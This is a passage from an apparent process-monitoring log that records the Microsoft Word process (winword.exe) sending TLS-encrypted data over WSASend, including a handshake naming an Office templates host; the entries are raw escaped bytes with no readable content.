348. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x9f\\xce\\xe7\\x87\\x19\\xcbp\\x00\\x8c\\xfb9\\xf0\\x93\\xa5\\x95\\xc7\\xe7\\x8a\\x11\\xf7\\xb7\\xfel\\x94\\xdc\\x94\\xc7\\x07\\xe7\\x83\\xd2\\x0e\\xe9\\xf5\\xdc\\xbdx\\x16\\x03\\x0f:\\xe2\\x85\\xb8j\\xfb'sw\\xd1n\\xc7\\x16i\\x81\"gi\\x1ch\\xb82\\xa3*\\x98\\xe1p\\xc5\\xa1\\xe1\\xa3\\xae\\xf6%\\x1a\\x16\\xb5dj\\xfe\\x1d\\x8e\r,!+\\xb7=)\\xbe\\xe6\\xd0\\xe1nc\\x98\\xabc\\x92\\x9a\\xa3\\x19h\\x8bb\\x10\\x07\\xb5\\xd8\\x8f\\x8d\\xcd\\xb5\\xd5d\\xf9\\x9c\\xdb\\xbcf`\\xdc~\\xef\\x1f\\x14\\xe4\\xc2\\x0e\r\rvw\\x80al\r)\\x19v\\xf1\\x13\\xbe-\\xc6\\x92\\xfa \\x8bh\\xd8l\\xe12q\\xad\\x89fe\\xad_e\\xf1\\xa1\\xe1\\xa1\\xa5\\xca\\xd3\\xf5o\\xcen\\xef\\xde$q\\xb1\\xf1\\x86y\\xf3\\xc1\\x0c\\xbe\\x08;\\x13\\xab\\x1a\\xda\\x08\\x00\\xcb\\x04\\xc9\\x83|\\xf7\\xca\\x98\\xd2\\xae\\x1f\\xac\\x00\\x9a\\x10_m\\xa2\\xa4\\xd6\\xe0\\xa1\\x16\\x9c\\xaekdf`~\\xd3\\xe4/y\\xdd\\x8e\\x06\\x9e\\x9a1\\x02\\xf9t\\x85\\xd1_\\xe7~o\\xa7"
349.  
350.  
351. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04\\xd2\r\\xdc\\xdc\\xf1|\\\\xbc\\x07?7\\xa6\\xba\\x80\\xcc\\xd2\\xd7#an\\x8fp\\xc3\\xac\\xaf\\xc2e\\x06\\xc0?s\\xc6e*v\\x97\\xe6\\x93\\xb9:p&\\xce\\x04\\xba\\x9c\\x7f\\xca\\x08b\\xed\\xb6u\\xaan\\xee\\xc2\\xeb\\xbd\\xf9 d\\x1d\\x8c\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\t\\x89\\xd7\\xad@\\xa3tw7\\xfb\\xca\\xda\\xe5y9\\xa56/\\xf0\\x92\\x86e\\xc7d\\xfc\\xac\\xd7\\xb1n\\x80;\\xf6\\x89q.\\x1e\\xe1\\x14\\x1d\\xc9\\xe7!\\x16\\xc7\\x08\\xa9"
352.  
353.  
354. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00f\\x10\\x00\\x00ba\\x04e\\xceik\\xc2\\x8c\\xfc\\x97\\xa8\\xb9\\x82\\xf4\\x1f\\xe2h\\xbb\\xae7\\x8b\\x10|\\xbc\\x14\\x95\\xea\\x04\\xb2c\\xebi\\x935\\x1a\\xf2^\\xcax\\x93\\x9er\\xb6c\\x89\\xa3\\xc3\\xe0\\x00\\xafo\\xf21vt\\x92hd8\\x9e\\xe7a\\xd8\\xbb\\x14\\x03\\x01\\x00\\x01\\x01\\x16\\x03\\x01\\x000\\x80\\xe3o\\x12h\\xec%c\\xb1\\x1c_\\xabmc\\x83\\xd1iu,\\x1f\\x00>?\\x00!\\xaf\\x91\\x8b\\xa2\\x022\\xdcl\\xec\\xbbc\\xf3\\x0fi\\xb3\\xf5,\\xbe\\xe2\\x89\\x86-"
355.  
356.  
357. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe1\\xd4\\xce61af\\x88\\x8d1\\xa1\\xdaz\\xb9\\x82o\\x86q\\xe3\\xcc\\x01\\xa9p$\\xe7-\r<\\\\x97\\x99\\xad\\xe7\\xa5\\xa2\\x0b\\x92\\xc6\\xbe\\xe5\\xf2\\x96\\xf6\\x9d\\x90\\xec\\xdd\\x0cq\\xf6\\x9e\\xa5g\\xd3&\\x82d\\x81\\xfc\\xe8e\\x0c\\x1a\\x82\\xad7\\xcb\\x12\\xdd>\\x10\\x1b\\xe4\\xe7r\\x00\\x9e\\xd5f\\xb3%e\\xb6\\xe4\\xd7\\x1d\\x98\\xe4\\xc2s\\xcd\\x85\\xc0\\xbd\\x94w\\xae\\xfd\\xfdbq\\xd2\\x96\\x94\\x10\\x0f,\\xdc^\\xae\\x81,h\\xd4\\xeell\\x08;z|jwf\\xda\\x8d\\xdf\\xca\\xdc\\xca4i\\xefu\\xf1\\xc8\\xa84c\\xd9\\xcdvy4e\\x8d\\x10\\xb0\\x08\\xd7\\xbb~\\xdcf\\x86\\x86\\x8b\\x8d\\x96\\x1f\\xd5\\xc7bfi\\x00:5\\xd7\\x19\\x95\\xact\\x11\\x13\\x1e\\x83i\\xd5z\\xcb\\xec\\xe0\\xe10\\xc7\\xd1\\x97/f\\xdd\\xf6\\\\xc5\\xf2<x\\xb6t\\xff\\x045\\xdfu\\xb4\\xc6\\?\\\r-\\x8b\\xe8\\xfd8i\\x02\\xe6\\x9e\\xe8vu\\xd1\\xd4$ho\\xc1\\x88\\x8a\\x1bm)\\x80d\\xa001\\xf9\\x1c\\xf06\\x0c\\x9e\\xf4x\\xc7\\xeah"
358.  
359.  
360. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010i\\x1b\\xf4<\\xe6+k\\xc1\\xbb\\x12\\xf4\\xcf\\x16\\xdf\\xf9c\\xda\\x80\\xf3\\xc5\\xc6;\\xc3\\xcb\\xa6\\xea\\x995q\\x8a\\xa9\\xc0\\x1e\\xa6\\xb9h-\\x9d\\xb85\\x19(\\x8c\\xfd2d\\xf6\\x022\\xe5\\xbb\\x920<\\x0e\\xedt\\x97\\x16\\xd4\\x12\\xf0\\xa9&\\xeb\\xb0b\\xc6\\xe4\\xc1\\xd8\\xe4\\xcc\\xa9\\xa22\\x7fg\\xcbx\\x0e\\xc7\\x89\\xb6m\\x8a \\xf4`mecy\\xe3v\\x8co\\xb4\\xfc\\x19\\xe8\\xaao\\xc8+y\\xe6d\\xdb\\xc11\\xa5\\xf8\\x98\\xabp\\x98\\xea\\xbd=\\x946\\xda0\\xe6^\\xed\\xc2\\xc4m\\xdfum\\xaa\\xb0\\xe8\\xcf\\xd8p\\xe6z\\xa6\\x0bqj~\\xb1<\\x00\\xec\\x85\\xf5n\\xa7j\\xdb\\xad\\x9c\\x01\\xfa\\xab\\xb3)\\xd0\\xc4w\\x98\\x07\\xc2~\\xf7\\xd0\\xd2\\x05+\\xa0n\\xb6l+\\xfap\\x80\\x96)\\xf8\\xef\\x0bn\\xca\\xd2\\xa8\\xee\\x184\\xe0\\xca\\x8d\\xb0#\\x8c#\\xb7|\\xba j-\"t\\xdazrj\\x02v\\xb7\\xb6\\xc0:d\\xf5;o\\x06)\\x9cv\\xa3)\\xdb\\xf0<\\x87\\xbf&\\xc5\\xc2wj\\xa6\\xae\\x9cr\\xf8\\xae"
361.  
362.  
363. "http_request": "winword.exe_WSASend_\\x16\\x03\\x01\\x00\\x83\\x01\\x00\\x00\\x7f\\x03\\x01x\\xee5\\x98u\\xc4\\xbd\\x9f\\xa6\\xfe\\x91 `\\xc1oe=k\\x80\\x8c\\x06b\\xcf\\x01g\\xf9\\xd2o\\x97g\\xef\\x00\\x00\\x18\\x00/\\x005\\x00\\x05\\x00\n\\xc0\\x13\\xc0\\x14\\xc0\t\\xc0\n\\x002\\x008\\x00\\x13\\x00\\x04\\x01\\x00\\x00>\\xff\\x01\\x00\\x01\\x00\\x00\\x00\\x00%\\x00#\\x00\\x00 omextemplates.content.office.net\\x00\n\\x00\\x06\\x00\\x04\\x00\\x17\\x00\\x18\\x00\\x0b\\x00\\x02\\x01\\x00"
364.  
365.  
366. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x15\\xf2\\x1d\\xf8\\x9a\\xda\\xf5\\xe9?,\\xaa\\x05\\xff\\x97\\x1fk\\xb9\\x02\\xaf\\xc2\\xa7\\x15g\\x8ayc\\x83vw\\xca\\xc2\\xdad\\xfa\\x82\\x1b6\\xbc\\x93\\xd7l\\xa9!\\xc2v\\x1d\\xb4g\\x92\\x8e\\xbfl\\xbf~\\x01/r-\\xfe\\xed\\x13\\x95>\\x99\\xffz\\x0b\\xcfh\\xc6j\\x9c\\xd4\\x82\\xde\\x82\\xfe\\xdf\\x1f\\x164\\x00\\xf6\\xf2\\xe4\\xaf\\xd3t\\x85\\xf8\\x812\\xe5=\\xc4r\\xf0\\xcc\\x04\\xfa\\xa1q\\x16\\x8d,n\\x188~\\x0cx\\x0f\\xad\\xfe@\\xe4h\\xf3\\x89z\\xf4\\xf9\\xb0\\xbb\\xc6b2\\xba\\\\xf9\\xccc\\xbf\\xf2\\xc4e\\x05:\\x82\\x1e0\\x1a\"\\xbaf\\xa3>a\\x1a\\xe7pi\\x82\\xa3m\\xe7\\xa8\\xb21\n\\xe6\\x8fs\\xa4\\xc2\\xb7\\xd3i\\x91`\\xe8\\x8a\\xa9\\xab\\xecm\\xab\\xaa\\x0f\\x13i\\x8a6x\\x80\\xf2\\xab\\xbam^e~\\xaa\\xd8\\xf4\\xa6\\xce\\xf49\\x88\\xe4\\xc0;\\xaf\\x0c\\xc5_\\x8es\\x8d\\x15\\xcb\\x87\\x08w\\xeec\\xd4\\xc2\\x99\\xae\\x1d,\\xebi\\x0ep\\xe7bz<\\x87o`i\\xce\\xf0\\x11bjwe\\x0e\\xa3\\xdd\\xa2\\xca\\x9c"
367.  
368.  
369. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xea\\x9f\\xba\\xcc\\xa0s\\xc0ux\\xa8z\\x0b\\xcc\\xc9u>\\xb5\\xf6\\xf4\\xeb\\x1e>\\x9f\\x88p\\xca\\xc6pf\\xe8\\xc9\\xcf5\\xa3\\xb0\\xa7^\\xd9?\\xda\\x90\\xe0\\xa3_e\\x1ay~@2\\xaat\\xb9\\xb7s\\xad%\\xbe\\xa0\\xbdg\\x13-\\x93\\xe0\\x84\\xeb\\xd02\\xe2k\\xc7\\xaah\\xa3b\\xcewv\\xb4\\xba\\xc5\\xd0a\\x86u\\x18\\xe4\\xc7?\\xe3&`\\x04\\xe3v\\xe5m\\xe6cd\\xebo\\x00s\\x8a\\xa0\\xa02\\x85\\xa9\\xf8\\xbe\\xe0;j\"\\xbd%\\x1e\r\\x8c~!\\xf6z\\xabe\\x1f\\xff\\x9c\\x93l\\xbf\\xce\\xdb,\\xd8\\x19\\xbd\\x8f\\xbb\\xebk^\\xcc\r\\xf8\\xdeb0\\xd0\\xb5\\xae\\x88\\xa3\\xe9\\x1e\\xbd\\x05\\x06\\x10y\\xb7?f\\xbb\\xde\\xd44\\xc9\\xcc\\xed\\x02\\xb7v\\xcd\\x08\\x94\\xf3\\xf8\\xf6\\x98>\\xee\\x0f8n\\xf6\\x15\\x81\\x8a\\xf4=,\r\\x98\r\\x81\\x86u\\xf52$g\\xde\\x1ads\\xb0\\xca\\x0b\\xf5\\x8d\\x847\t#\\x1fd\\xfb6\\x14`\\xfbz^`\\xf9\\x19\r\\x94\\xf0\\xae\\\\x00\\xf1n\\x9f\\x81\\x93j\\x92\\x87\\xf9)"
370.  
371.  
372. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010ws\\x01\\x8a\\xf3\\xd0\\xd1\\x19\\x8b\\x04f\\x0e\\xb2s\\x1c\\xfb\\xbcu\\xc2\\x18\\xd8\\xac\\xd4\\x82\\x01\\xe1\\x83\\x1b\\x8f\\xe9\\xdd|\\xfc\\xae\\xb5\\x85\\xe5\\xbc,\\xe4\\xab\\xde\\xcc\\xd7\\x81mt\\xbc\\xde.jgm\\xf0*g\\x17\\x12\\xfd a\\x9a;\\x8aqv\\x7f\\x89\\x8e\\x80\\xca9\\xc3\\x85\\x7fzla\\xc7\\xb7\\x87z\\xc8\\x9eg\"6`\\xfe\\x97\\xf9\\xfe\\x01:bq\\xfb\\x8bok\\xf0a\\xd0\\xc3\\xe3u\\xc8\\xc4\\xe6#\\xd7\\xcb\\xc7\\xfe'nb\\xeb\\xdd\\xab\\x1e\\x0bc\\xd6l\\xda\\xe58\\x04\\xcbs'\\xc6\\xc1\\x94=\\xe0\\xc8'\\x009r\\xa3\\xa1\\xab\\x18y\\x96>\\xbf\\xf1+\\xe5)\\x99\\xf1\\x8d\\x1d\\xe1|g\r\\xfa\\xbe\\xd6\\x91\\x045\\xc1\\x13\t\\xc2\\x0b\\x04\\xae;c\\xfcq\\xd9\"i \\xe1\\x047\\xd1_\\xac5\\xe0w\\x12\\x83\\xb6\\xdd\\x8a\\xdcz\\x10-\\xf7\\xf54\\xb9\\xc46u\\x8e\\xa2\\x18\\xec\\x9f\\xdf\\x91\\xbfs0d\\xdd\\x83\\xf7\\xb4n\\x91\\x95\\xe5\\x1a\\xda\\x96\\xbb\\x89\\x8fb\\xe2\\xe8\\xb1\\x8b\\xd0\\xe4\\x9c\\x11co\\x9bk"
373.  
374.  
375. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xcb#'h.\\x92\\xc5\\xb8\\x0c\\xb0\\xb5\\xcb`\r;\\xd1o\\xb8q\\xd6\\xbf\\xcfh\\xb2\\xb3\\x11%\\xf3~\\xce\\xd4yv\\x8a\\xc1\\xec\tu\\xcc\\xab\\xed7\\xe9\\x1b\\xbat4\\xc0jb>`l\\xde\\x7f\\x04/\\x89koxe\\x1a\\xff,\\xc5\\xc3p\\xf6\\xd1\\x96\\xbd3\\xc12#\\xc3\\x1a/\\x80\\x14oo\\x90\\x8eg\\xba+.=\\x1e`\\x00aqhp\\x91eu \\xff\\xc7\\xd6\\xd2\\x9c!\\xa3\\xb2\\x16?'\\xc2\\xce\r\\xb4\\xf5\\xb3amj`\\xda6\\xbd\\xed|\\x98\\x9b\\xc0`\\xafe=3\\xd8hs<k3\\x8c`\\xbb\\x1f`\\xe4)\\xaa\\x84jk\\xd2\r\\x01$\\xd8<\\x07ba.\\xea\\x8ea\\x9c'\\xf8\\xcb\\x83\\x95v\\xb2\\x9b\\xb9\\x02 e\\xbf\\xb1\\x16\\xe4\\\\xec\\x9f4\\xbf\\xbc\\x87f(\\xc1\\xab0aq\\x9a\\x12.\\xb0u\\x19\\x9f\\xb4\\x893y\\x0b\\xfbl\\x0c\\x8e\\xbc\\xc5\\x16\\x89\\x00\\x8e\\xdd\\\\x96\\xc7y5,\\xda*\\xca\\x88w\\x11\\xa5\\xb6f\\xf6\\xba\\x18\\xba\\xde\\xe9\\xf2^\\x18\\x81\\xe7\\x18\\x17\\x08\\xdc"
376.  
377.  
378. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x0108n\\x9ez\r\\xdbd$\\xfcw\\x0c\\xb9\\xaen\\xab\\x94vw9w\\xd3\\xd9\\x80\\x07\\xdcl\\xc1\\x07\\x97\\x98\\xbe\\x9ds\\xde2o\\x81r\\xca\\xe6v\\xber\\xad\\xfd\\xc1y:,\\xc5d\\xb2\\xde\\x03n3x-\\x83k\\xeb\\xfar5*\\xd9?\\xc6\\xc6\\xda\\x8d?\\xf1\\xc5\\x8b\\x8b\\xcdq.\\xdeu\\xb8\\xd4\\xe2$+\\xf6\\x8f4\\xfca\\xc8z(\\xc9-$\\xab\\xcf\\xbbchq\\xa0\\xf8\\xe1\\x10\\xdf\\xd2\\xce\\xd6\\xae\\xa6<\\x98-\\x0e\\xb2\\x98\\x1d\\x9aw\\xeb\\xfa0d\\x86\\xcf_\\xf5.v\\xcf9\\xd82\\xff\\xf6\\x80b\\x7f\\x0cw\\xfd5\\xbaeq\\xe3\\xc0\\xdb\\xb7\\x86\\xb58-s\\xee\\xfd\\xa8\\x8d\\xd0\\x9eu\\x9e\\xc7&\\xdfm#\\x12\\x8e\\xf5\\xbb\\xb5e\\x17\\xa9\\xe4\\x1ey\\xc6n\\xd5\\xd1\\xa24c,\\x948`\\xfb\\x1a<\r\\x0c\\xc9\\xf0\\xb0\\xc7\\xbc\\x1a\\xbap\\x05o\\x80a\\x8f+\\xd6\\xfe\\x82\t0\\xc5d\\xe8n\\xa9\\xcf2\\xa5\\x9b\\xa8z\\x97\\xd51\\xc9q\\xfa\\xb9\\x1b\\xac\\x03\\xe9\\x03\\x15%=8o\\xac\\x89\\xba\\x17v\\xa1"
379.  
380.  
381. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xb1\\x98\\xaaq\\x95\\xb9@\\xa4\\x84ocy\\x06\\x0f\\xd8(\\xe9hi\\xbc\\xd6\\xa9\\xe0\ty\\x83\\xc1u\\xe9\\xc2k\\xf7\\xf0h\\xben\\x9a\\xb8\\xfc#f\\x0f\\xda\\xc3\\xb9\\x08a\\xed\\xfet\\x9a\\x8c\\x83\\xec\\x92\\x82\\xc3y\\x94l\\x03!+2\\x8d\\xec\\xb33\nk\\x0f\\x90\\xe2\\x9c\\xed3\\x83\\x84w\\xce\\xe5\\xba\\x06u\\x8c\\xca\\xf5\\x88\\xcb\\xb5\\xe0cg\\xa5\\x99\\xb0\\xd1\\xb5d\\xa6\\x85j\\xd0\\x8c\\xe5\\xb2\\x88\\xb2\\xb0\\x87$ \\xfco\\xae\\x0e\\x8c1\\xf0\\xb9\\xba\\xbd|\\x10\\xb4d\\xfeo\\xb84\\xfa\\xe0\\xec\\xc4\\xb8\\x88d\\x14%~\\xe1\\xden!\\xb9\\xd9\\xf4\\x15\\x9fz\\xca\\xa8)\\xca\\xbe\\xba\\xce7\\x9b&\\x83v\\xb6\\xa1\\xfa\\xa4kpj\\x190b)e\\x87\\xe8\\x93\\x18\\xf6\\x19\\xb8\\xd8g0kjpkvwz\\x0eb\\xa1mp\\xa8\\x1e\\xf7\\x01bgz\\xe0\\xdf\\xff\\x9b\\xa6\\xa1\\xf9\\x1a\\xc4\\x8a\\xa8\\xd5\\x8b\\x11\\xd8\\x17i\\x8f+\\x0c\\xaavh\\xde*tv\\xb1\\x91f\\xf8y\\x88\\xb8\\x8d\\x9b=\\xa21 a\\xf2\\xc4"
382.  
383.  
384. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x05\\x98\\x8a\\xeb\\xcb^ h\\xaf\\x93!\\xa9\\x1f\\xe6\\xe1\\xca\\xa9/?\\xd2\\xe4\\x02\\x1c\\xc9\\x8d\\x9b\\xfe\\x99\\x93\\xf4\\x98zq`\\xa0\\xc5\\xce\\xb5\\x1ey1\\xa8dz\\xf4\\x9c\\xb2w\\xa3i>\\xcd+q\\xa53ii\\xf7\\xe1ber\\xf1\\xe7'y\\xceb*\\xbb\\xa4^\\xbe&\\xf1wc\\xd0|^\\x1eg8\\xcb+@\\xbe\\x16\\xe8^\\xbes\\xdcx\\x8a<c\\x8b\\xe2\\xc1\\xbf\\x0b\\xbd\\x19\\xce\\xb2\\xf6\\xcf\\x07\\x88\\xe7\\xc3\r\\x91\\xf2-\n\\xb9wq\t\\xd6*!\\x1c~\\xeay\\xd2\\xc7_\r ~c\\xb3\\x83\\x07e\\x8a\\xfcv*g(t\\xaf\\xbd\\xd7,eyy\\x93,\\x02ux\\xfcgc\\xb1\\xc7\\xbf\\x9b#m\\x04\\xe2\\x81\\xdc\\x96\\x14\\x03r\\xfd\\xe6\\x04\\x90p\\x92\\xc8t\\xc5\\xd4\\xe0&\\x15_\\xe3\\xbbf\\\\x80\\xe2\\x19\\xb9\\x06\\xd4\\x97\\xe7a\\x1e\\x10\\x87\\xd1ax\\xda\\xb9\\xcd\\xb0\\x9fq\\xe9\\xdab\\xfc\\x80\\x98pvx`1vt\\xa7\\x91:2d\\xf7>\\xe4r\\xd2\\x96\\x9c\\x90\\xf5\\xcdhh\\x02\\x90"
385.  
386.  
387. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010h\\xbc\\xae\\xcc\\xc23g\\xaa\\x01\\x1f\\x1a.q|\\x9a\\xebr#\\xfd\\x94w\\xfd\\xca\\x8e\\x8d~\\xc2\\xe1\\xaf/\\xff\\xdc\\xd4pm\\x94#\\xbb\\xc8w%qc\\xe5;\\x84\\xcazu\\xcd\\xce\\xb3s\\xed\\xbf\\xfe\\x10\\xe7\\x02y\\xda\\xd8d0\\x86\\x10\\xa7v\\xc7|\\x9fc\\x9a\\xb0hk>e\\xa7\\xab\\x89\\xdbhd\\xc5$\\x1by\\xb8\\xec\\xe3(\\xd4\\x9e\\xd2\\x85|\\xb6(q\\xf5\\x96d&\\x8fh\\xe5\\xef\\x9c\\x99\\xc2gr\\x1d\\x9d\\x81\\xbe\\x91\\xf4-yi\\xdf\\xf2\\xe6\\x91\\xf7k\\x0f\\xb1q7uj\\xf3v\\xd7\\xa3c\\x1e\\x96\\xe3\\xc0p\\xae\\x00\\xcd=\\x10\\xb7\\x85\\xd5\\xfd\\xfcoi\\x0e2\\x91\\xd1\\x07\\xf8\\xaf\\xf2\\xb05c\\xc2\\x0fkw\\xcd6\\x8a\\x8ct\\x9c%i\\x14\\xbe\\xb7l\\xf4\\xd9\\xa5\\xf7\\x05g\\x00\\xdbw=\\xf6\\xd5@k\\xc1\\xe6\\xdd\\xdb\\xba\\xcck\\x917b\\x94\\xe5\\x15o\\xd15e\\x81\\xd8\\xde\\xaex\\xdf\\xa6\\xac\\x913b\\xfe\\xd63\\xc9vuh\\\\x8eh\\x93\\xf3s\\xdbar\\xdb\\xf77"
388.  
389.  
390. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\x84\\xe5x\\x92\\x02 zf\\xa7\\x89b(o\\x9e \\xae\\x10't\\x81\t\\xa7q\\xbd\\x1af\\xa0\\xf7\\xf7\\x0f\\x12f\\xe3h\\xab\\xbb\\x04\\xc3\\xb5\\x118\\x8et\\xb8\\x0c\\x1b\\xe2\\\\x91^\\xfas\r0\\xe7\\xf8z|o\\xb0\\x9f\\xdd\\xe8%g\\x1e\\x86\\xf7\\xb7\\xa7\\xe1\\x1b1\\x1d\\xbf\\xe3*\\x0bt\\xc0o\\xceb\\xd3j\\x88\\xe0\\x01sp2\\x9eh\\x1f\\xcc\\xb2@\\x9e\rh\\xadd8;\\x99\\x99\\xa3ff\\xd1+\\xb1\\xc1\t\\x1c\\xa2\\x991\\xe3!q\\xdd\\xcc\\xbcg\\xb0\\xb1\\x1b\\xfc\\xf6\\xa2\\x84\\x8f\\xe1\\xd7^/\\xb8\\xc2\\x07\\xa1fl`\\x10\"v\\xe2\\x94\\x8f\\x06\\x1f\\xfa?y\\xbf\\xa98\\xb6\\x87\\xcf\\xd3\\xb4q\\xe1v\\xc6bx\\xff\\xb6\\xca\\xaa\\x13\\x17\\x1a\\xdf\\xe8\\x12h\\xb7\\xce(\\xdavi\\xed\\x12\\xd0\\xe0\\x12\\xb7\\x15$iw\\xaa=mx;p\\x10q\\x98r\\x18wbbd\\x01\\x81\\x0e7\\xe5\\xef\\xb9\\xd9?\\x9d\\x0cw\\xc5\\xaa\\x90fwo;\\xa7nf\\xf8q\\x7f\\x19\\xec\\x0f\\x0b\\x93\\xbflos\\xd3"
391.  
392.  
393. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xdf\\x17(\\xf5j\"er>q\\xfe\\x92i\\xfc\\xe2@\\xf0\\xc6p\\xab\\x82\\xb9\\\\xa4\\x1f\\xdf\\xfc\\x10\\x8e\\xf8\\x84`r\\xed\\x1b\\xc8k\\xbe+\\x98\\xc3\\x9a\\xd2\\xcf\\x00\\x82\\xa4\\xed$\\xb3\\xb4\\xc0\\x80\\x80wm\"\\xc3w-\\xea\\x8d|\t\\xc8d5\\x91\\xf8\\xed\\xb5\\xe0\\xed\\x18t\\xe1\\0#z\\xabw\\x84\\xa5\\x8e\\xfc\\xf8\\x82\\xe4\\x84\\x95\\xf5\\x19\\xaf\\xd0i\\xfc\\xbf\\xf5q\\x08\\x0c\\xb7^\\x1da=k@a\\xfa\ro8ux\\xdf\\x04\\x8cf\\x13\\xcbo,\\x13\\xb9\\x1a2x\\xc9%\\xa9\\xf8\\x96\\x90p\\xeb\\xf1z\\x17o\\xaf\\x1e\\xe0c\\x88\\xdc\\x84/\\x95/e\\x1d\\xf4\\x83\\x0c\\xd4_b\\xc2\\xdd>\\xa9+&>\\x9en@0s\\xcb\\x8d\\x8a\\xfd\\x97\\xaa@\\xd8\\xe38\\xb3s\\x8e\\xb0:\\xe4\\xf47o\\xd3\\x1c\\x19\\xb5\\xab\\xf3\\x1e\\x01t\\x0b\\xab\\x1di\\xb5,\\x86\\xa1>\\x90o\\xff\\xab\\x8f-\\xf2\\xc21q#\\xddhwm\\x07\\xf8\\x1f\\x99\\xd5y\\x02\\x8c\\xe0b\\x8a\\xa4*\\xfb *\\xc5\\x156\t\\x8c\\x04\\x7f*\\x90"
394.  
395.  
396. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010,!\\xef\\xcc\\xff\"\\x9b\\x1f\\xa9\\xde\\xa8\\xa0\\xab\\x0bhr\\x88@\\x8f&u\\xa0\\xa3;\\xf5\\x86\\xe4\\x92\\xcbg\\x87\\xf8q\\xad\\x054w\\x93\\x12/\\xbb@\\xca\\xb7v\\xba\\x03g\\xc3\\xdc5\\xf6\\x14;\\xff\r\\xf0\\xd9\\x86l\\x19\\xf4\\xe7\\x97\\x02\\x99\\xbd\\xd3\\xaf\\xa5\\xf8\\xee\\x00\\xb9\\xac\\x83\\xde\\x80x\\x9b\\x1c0\\x1c\\x1f\\xdco\\xb1w\\xeel\\x99%czk\\xd5f\"e\\x0b\\xe1q%\\x02%c\\xdai\\x0ba\\xed\\xa1.\\x84\\xc1\\xa6<\\xb9\\xdf\\xfd\\x91\\xc150'c'\\xe3y\\xef!7w\\xccm\\xc6\\x82:\\x06\n\\xbcb1\\xdf\\xfc\\xdc\\xc6\\x17\\xcej\\xf0c\\xa4\\xc8\\xd2\\xda&\\xbc\\x97\\x8ci\\xb2\\xbe\\xf5\\xb86\\xfc\\xdf7d\\x8e\\xa3\\x0c\\x93\\x96\\xd7\\xa0\\xcb~\\xd8\\x9b\\x11\\x99\\x9dp6\\x1d\\xbd3\\xef\\xa3\\x06\\xf5 \\x8d\\xcam\\x8b\\xce\\x91\\xc1e\\xa2bcjo\\xfd\\x8b\\xa5\\xfc\\xb8\\x10u~f\\xbad0\\xa9v\\xd9@\\x13\\xd6\\xb9\\xbe\\xd3\\xce \\\\x8c\\xe5\\xd5\\xf5w\\xd5\\x1a\\xfd/\\xf1&x\\x04r\\xf5\\xd8\\xd0\\xbc\\xba"
397.  
398.  
399. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010y\\xabo\\xb7wj=d\\xacr\\xe5\\xde4\\x03m\\xcd\\x10l\\xc7\\xf1\\x01\\x8f\\x12\\xc3\\xf1m\\xddl\\x0fr\\xce\\xcc\\x96\\xc1\\x02upu;;t\\xa53\\xf2'_\\xc2\\x1a\\x03v\\x1f\\xd0\\xce\\xfd\\x10\\xd9\\xf4\\x1er\\x07\\xf3bp\t\\xda \\xc8\\xf2\\xdc\\x13\\xfb`y\\x93\\x9b0y2\\xc8r\\x13\\xe0\\xc0n\\x8d\\xa361/\\xa2m\\xf5w\\x7f\\xf9og\\xe6y\\x96gb\\x93=\\x1aw\\xb6\\xa9\\xc6\\x19\\xf2=\\xe9\\xd1w*\\x00\\x8e\\xd1\\x9ep\\xa6\\xbe\\x10|\\x1c\\x9d\\xefu\\xb0\\x111\\x9b\\xb1\\x94\\xc4:t\\xcdl\\x1dx\r\\x93:\\xbc`:\\xd9\\xac\\xb1\\xa4\\xd4:i\\xc9c\\xd8\\x19y\"k>\\x83\\x8d\\x81i_\\xc8\\xec\\xb2%-\\x0e`\\x12fm\\x11\\x1dkh\\x92\\xec\\x83\\x0f\\x849\\x818\\xbf\\x00\\x18\\xb3d\\xc0\\x19\\x11&\\xef\\xdb8\\xd0\\xfb\\xe3g\\xca&!\\xd5+\\x1d\\x9f\\xaab&\\xb3\\xcf\\xb6f\\xed\\xc1\\xa1\\xe8\\xa4w\\xbc\\x14\\xdek\\xf7\\xa1m$\\xf32@y#\\x83\\x8d\\x7f\\xb8~"
400.  
401.  
402. "http_request": "winword.exe_WSASend_\\x17\\x03\\x01\\x010\\xe2\\xe2\\xd2\\x00s\\x03 b\\x87\\x10\\x88xa\\x92\\xc6\\x87\\xb4\\xd5l\\xfe^5\\x1a\\xa3\\xb5j\\xc1\\xcfap\\xec_\\xcf\\x01\\x19dyg\\xd1\\xfd\\xd2fdf\\xaf\\x12vi\\\\xa5\\x14\\xe7q\\\\xd2\\x04g\\x16\\xf8\\xf21x\\xb6\\x1d\\x1a \\x87\\xca.8\\x06whr\\xdf\\xdf%7e\\xdd\\xddjlt<\\xa2\\xbf\\x12;;\\xc5f\\xab-\\xad\\xb47*t\\x01>\\xd3-\\x81\\x18q\\xbc\\x95*4\\xdct\\x9e\\xbd\\xfet\\x19\\xe9v\\x9c\\xb7e 